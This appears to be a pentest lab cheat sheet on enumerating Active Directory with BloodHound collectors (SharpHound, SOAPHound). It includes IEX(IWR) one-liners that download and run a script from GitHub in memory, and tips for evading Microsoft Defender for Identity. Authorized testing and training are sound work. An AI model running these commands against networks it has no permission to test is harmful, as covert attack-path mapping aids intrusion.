bloodhound-enumeration

Bloodhound Enumeration

There are two free versions of BloodHound

• BloodHound Legacy - https://github.com/BloodHoundAD/BloodHound

• BloodHound CE (Community Edition) - https://github.com/SpecterOps/BloodHound

Supply data to BloodHound with Loader.exe

C:\AD\Tools\Loader.exe -Path C:\AD\Tools\BloodHound-master\BloodHound-master\Collectors\SharpHound.exe -args --collectionmethods All

Supply data to Bloodhound with IEX

IEX(IWR -usebasicparsing https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1);Invoke-Bloodhound -CollectionMethod "All,GPOLocalGroup"

Avoid Detection by MDI with Loader.exe

To make BloodHound collection stealthy, remove noisy collection methods like RDP, DCOM, PSRemote and LocalAdmin, use the -ExcludeDCs to avoid detection by MDI:

C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SharpHound\SharpHound.exe -args --collectionmethods Group,GPOLocalGroup,Session,Trusts,ACL,Container,ObjectProps,SPNTargets,CertServices --excludedcs

Remember to remove the 'CertServices' collection method when using BloodHound legacy collector.

Avoid Detection by MDI with IEX

IEX(IWR -usebasicparsing https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1);Invoke-Bloodhound -CollectionMethod "All,GPOLocalGroup" -ExcludeDCS

SoapHund Enumeration

Use SOAPHound for even more stealth. It talks to Active Driectory Web Services (ADWS - Port 9389) in place of sending LDAP queries - just like the AD Module.

• Almost no network-based detection (like MDI).

• It retrieves information about all objects (objectGuid=*) and then process them. It means limited LDAP queries - less chance of endpoint detection.

Build a cache that includes basic info about domain objects

SOAPHound.exe --buildcache -c C:\AD\Tools\cache.txt

Collect BloodHound compatible data

SOAPHound.exe -c C:\AD\Tools\cache.txt --bhdump -o C:\AD\Tools\bloodhound-output --nolaps